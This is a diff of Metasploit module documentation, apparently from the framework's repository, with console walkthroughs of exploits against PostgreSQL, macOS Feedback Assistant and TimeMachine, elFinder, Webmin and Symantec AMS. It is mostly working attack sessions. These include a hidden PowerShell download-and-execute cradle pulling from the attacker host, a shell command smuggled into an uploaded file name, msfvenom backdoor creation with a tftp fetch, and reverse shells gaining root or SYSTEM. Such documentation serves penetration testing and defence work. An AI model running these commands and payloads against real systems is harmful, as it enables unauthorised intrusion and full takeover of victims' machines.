[*] Started reverse TCP handler on 192.168.0.18:4456
[*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit
[*] 192.168.0.25:5432 - Exploiting...
[+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully
[+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable created successfully
[+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable copied successfully(valid syntax/command)
[+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully(Cleaned)
[*] 192.168.0.25:5432 - Exploit Succeeded
[*] Command shell session 2 opened (192.168.0.18:4456 -> 192.168.0.25:51784) at 2019-03-24 18:07:11 +0000
whoami
postgres
uname -a
Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
/usr/lib/postgresql/11/bin/postgres -V
postgres (PostgreSQL) 11.2 (Ubuntu 11.2-1.pgdg18.04+1)
### Exploiting PostgreSQL 10.7 on Windows 10
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.0.18
LHOST => 192.168.0.18
msf5 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.18 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf5 exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.18:4444
[*] Using URL: http://0.0.0.0:8080/pUDD5sy8vTTD
[*] Local IP: http://192.168.0.18:8080/pUDD5sy8vTTD
[*] Server started.
[*] Run the following command on the target machine:
msf5 exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD');
msf5 exploit(multi/script/web_delivery) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres
DATABASE => postgres
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.24
RHOSTS => 192.168.0.24
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no Send a custom command instead of a payload, use with powershell web delivery against windows
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 192.168.0.24 yes The target address range or CIDR identifier
RPORT 5432 yes The target port (TCP)
TABLENAME msftesttable yes A table name that doesnt exist(To avoid deletion)
USERNAME postgres yes The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set COMMAND powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(\'http://192.168.0.18:8080/pUDD5sy8vTTD\');
COMMAND => powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD')
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
[*] Started reverse TCP double handler on 192.168.0.18:4456
[*] 192.168.0.24:5432 - 192.168.0.24:5432 - PostgreSQL 10.7, compiled by Visual C++ build 1800, 32-bit
[*] 192.168.0.24:5432 - Exploiting...
[+] 192.168.0.24:5432 - 192.168.0.24:5432 - msftesttable dropped successfully
[+] 192.168.0.24:5432 - 192.168.0.24:5432 - msftesttable created successfully
[*] 192.168.0.24 web_delivery - Delivering Payload
[!] 192.168.0.24:5432 - 192.168.0.24:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(''http://192.168.0.18:8080/pUDD5sy8vTTD'');';
[*] 192.168.0.24:5432 - Exploit Failed
[*] Exploit completed, but no session was created.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >
[*] Sending stage (179779 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.24:50154) at 2019-03-24 17:40:59 +0000
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ DESKTOP-BHTT8OP 192.168.0.18:4444 -> 192.168.0.24:50154 (192.168.0.24)
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
@@ -0,0 +1,33 @@
## Background
This module exploits a race condition in MacOS' Feedback Assistant, which would lead to root local
privilege escalation.
## Demo
```
msf5 exploit(osx/local/feedback_assistant_root) > check
[*] The target appears to be vulnerable.
msf5 exploit(osx/local/feedback_assistant_root) > run
[*] Started reverse TCP handler on 172.16.135.1:5555
[*] Uploading file: '/tmp/.fjbgrf'
[*] Uploading file: '/tmp/.fljhjbwe'
[*] Executing exploit '/tmp/.fljhjbwe'
[*] Transmitting first stager...(210 bytes)
[*] Exploit result:
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
"/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
@@ -0,0 +1,62 @@
## Vulnerable Application
This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers from a command injection vulnerability that can be exploited by creating a specially crafted disk label.
The tmdiagnose binary uses awk to list every mounted volume, and composes shell commands based on the volume labels. By creating a volume label with the backtick character, we can have our own binary executed with root priviledges.
## Verification Steps
1. Get a session on a vulnerable system
2. `use exploit/osx/local/timemachine_cmd_injection`
3. `set lhost <IP>`
4. `set lport <PORT>`
5. `set session <session_id>`
6. `run`
## Scenarios
### Mac OSX 10.14.3 (Mojave)
```
msf5 exploit(multi/handler) > use exploit/osx/local/timemachine_cmd_injection
msf5 exploit(osx/local/timemachine_cmd_injection) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.2:5555
[*] Uploading file: '/tmp/qhjlknnmf'
[*] Executing exploit '/tmp/qhjlknnmf'
[*] Exploit result:
2019-04-18 16:18:29.190 qhjlknnmf[51122:107119] creating dmg image
2019-04-18 16:18:33.300 qhjlknnmf[51122:107119] mounting malformed disk
2019-04-18 16:18:33.564 qhjlknnmf[51122:107119] sending XPC msg
2019-04-18 16:18:33.564 qhjlknnmf[51122:107119] now wait a few minutes for the root command to run
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 192.168.0.2
[*] Meterpreter session 2 opened (192.168.0.2:5555 -> 192.168.0.2:34270) at 2019-04-18 16:20:02 +0800
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
### MacOS 10.13.3 (High Sierra)
```
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.86.1.31:4444
[*] Uploading file: '/tmp/.xbdtqiynvb'
[*] Executing exploit '/tmp/.xbdtqiynvb'
[*] Exploit result:
2019-06-29 12:26:29.052 .xbdtqiynvb[553:3447] creating dmg image
2019-06-29 12:26:33.193 .xbdtqiynvb[553:3447] mounting malformed disk
2019-06-29 12:26:33.533 .xbdtqiynvb[553:3447] sending XPC msg
2019-06-29 12:26:33.534 .xbdtqiynvb[553:3447] now wait a few minutes for the root command to run
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (813560 bytes) to 192.168.86.1.32
[*] Meterpreter session 3 opened (192.168.86.1.31:4444 -> 192.168.86.1.32:55888) at 2019-06-29 05:27:24 -0500
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
@@ -45,6 +45,11 @@ to work.
Set this to a node ID on the target when using the `GET` method.
**DUMP_OUTPUT**
Enable this if you'd like to see HTTP responses, including command
output. Defaults to `false` unless `cmd/unix/generic` is your payload.
## Usage
```
@@ -0,0 +1,90 @@
## Description
This module exploits a command injection vulnerability in elFinder
versions prior to 2.1.48.
The PHP connector component allows unauthenticated users to upload
files and perform file modification operations, such as resizing and
rotation of an image. The file name of uploaded files is not validated,
allowing shell metacharacters.
When performing image operations on JPEG files, the filename is passed
to the `exiftran` utility without appropriate sanitization, causing
shell commands in the file name to be executed, resulting in remote
command injection as the web server user.
The PHP connector is not enabled by default.
The system must have `exiftran` installed and in `$PATH`.
## Vulnerable Software
[elFinder](https://studio-42.github.io/elFinder/) is an open-source file
manager for web, written in JavaScript using jQuery and jQuery UI.
This module has been tested successfully on elFinder versions 2.1.47,
2.1.20 and 2.1.16 on Ubuntu.
Enable the PHP connector:
```
mv php/connector.minimal.php-dist php/connector.minimal.php
```
Install required `exiftran` utility:
```
apt-get install exiftran
```
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection`
3. Do: `set rhosts <IP>`
4. Do: `run`
5. You should get a new session
## Options
**TARGETURI**
The base path to elFinder (default: `/elFinder/`)
## Scenarios
```
msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
rhosts => 172.16.191.253
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
verbose => true
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
[*] 172.16.191.253:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
[*] Sending stage (38247 bytes) to 172.16.191.253
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
[!] Tried to delete .kPUXqhMZ.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```
@@ -0,0 +1,63 @@
## Description
This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.
## Vulnerable Application
This module has been tested with [Webmin 1.900](https://sourceforge.net/projects/webadmin/files/webmin/1.900/)
## Options
**GUESSUPLOAD**
Use default installation path `/usr/share/webmin/`
## Verification Steps
1. `use exploit/unix/webapp/webmin_upload_exec`
2. `set rhosts <rhost>`
3. `set username <username>`
4. `set password <password>`
5. `exploit`
## Scenarios
### Tested Webmin 1.900 on Ubuntu 18.04 x64
```
msf5 > use exploit/unix/webapp/webmin_upload_exec
msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
rhosts => 172.22.222.154
msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser
username => unixuser
msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser
password => unixuser
msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[-] Failed to determine webmin share directory
[-] Set GUESSUPLOAD to attempt upload to a default location
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true
guessupload => true
msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[+] Session cookie: 46cbd354e4532fe55d1a462db128905c
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[!] Could not determine upload directory. Using /usr/share/webmin/
[+] File gxvgsiji.cgi was successfully uploaded.
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500
[+] Deleted gxvgsiji.cgi
uname -a
Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
root
exit
```
@@ -0,0 +1,167 @@
## Vulnerable Application
This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution. The payload is uploaded via TFTP
and then executed on the system.
This is part of Symantec AntiVirus Corporate Edition 8.0-10.1.7
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/antivirus/ams_hndlrsvc`
4. Do: `set rhost`
5. Do: `exploit`
6. You should get a shell.
## Options
**CMD**
Optional command line to run instead of attempting to directly inject a payload
**RPORT**
The port the service is running on. Default is 38292.
## Scenarios
### Manual Upload and Execute
If the module doesn't work for a shell, it's possible to run the CMD twice to emulate the steps the module takes.
1. start atftpd: `atftpd --daemon --port=69 /tftpboot/`
2. create payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 lport=4444 -f exe -o /tftpboot/backdoor.exe`
3. start metasploit
4. start a multihandler
5. load the module: `use exploit/windows/antivirus/ams_hndlrsvc`
6. use ams: `set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'`
7. run
8. use ams: `set cmd 'backdoor.exe'`
9. run
```
root@kali:~/metasploit-framework# ./msfconsole
msf > ifconfig
[*] exec: ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 1.1.1.1 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::20c:29ff:fef9:62a1 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:f9:1f:a1 txqueuelen 1000 (Ethernet)
RX packets 70933 bytes 39287343 (37.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11688 bytes 3788654 (3.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
msf > use exploit/multi/handler
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Starting the payload handler...
msf exploit(handler) > use exploit/windows/antivirus/ams_hndlrsvc
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 9999
lport => 9999
msf exploit(ams_hndlrsvc) > set cmd 'tftp -i 1.1.1.1 GET backdoor.exe'
CMD => tftp -i 1.1.1.1 GET backdoor.exe
msf exploit(ams_hndlrsvc) > run
[*] Started reverse TCP handler on 1.1.1.1:9999
[*] 2.2.2.2:38292 - Executing command 'tftp -i 1.1.1.1 GET backdoor.exe'
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > set cmd 'backdoor.exe'
cmd => backdoor.exe
msf exploit(ams_hndlrsvc) > run
[*] Started reverse TCP handler on 1.1.1.1:9999
[*] 2.2.2.2:38292 - Executing command 'backdoor.exe'
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1038) at 2016-09-30 11:59:13 -0400
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WEBB 1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
msf exploit(ams_hndlrsvc) > sessions -v
Active sessions
===============
Session ID: 1
Type: meterpreter x86/win32
Info: NT AUTHORITY\SYSTEM @ WEBB
Tunnel: 1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
Via: exploit/multi/handler
UUID: 0a85ec1678bc8465/x86=1/windows=1/2016-09-30T15:59:12Z
MachineID: 8b2889ec93a961f2cc3f2db4620def57
CheckIn: 28s ago @ 2016-09-30 12:00:15 -0400
Registered: No
msf exploit(ams_hndlrsvc) >
```
### Using Standard Options
```
msf > use exploit/windows/antivirus/ams_hndlrsvc
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 4445
lport => 4445
msf exploit(ams_hndlrsvc) > show options
Module options (exploit/windows/antivirus/ams_hndlrsvc):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD no Execute this command instead of using command stager
LHOST 1.1.1.1 no The listen IP address from where the victim downloads the payload
RHOST 2.2.2.2 yes The target address
RPORT 38292 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 1.1.1.1 yes The listen address
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ams_hndlrsvc) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4445
[*] 2.2.2.2:38292 - Sending request to 2.2.2.2:38292
[+] 2.2.2.2:38292 - tftp -i 1.1.1.1 GET OQTAVJBVWZH.exe
[*] 2.2.2.2:38292 - Attempting to execute the payload...
[+] 2.2.2.2:38292 - OQTAVJBVWZH.exe
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4445 -> 2.2.2.2:1041) at 2016-09-30 12:13:18 -0400
meterpreter >
```

Some files were not shown because too many files have changed in this diff Show More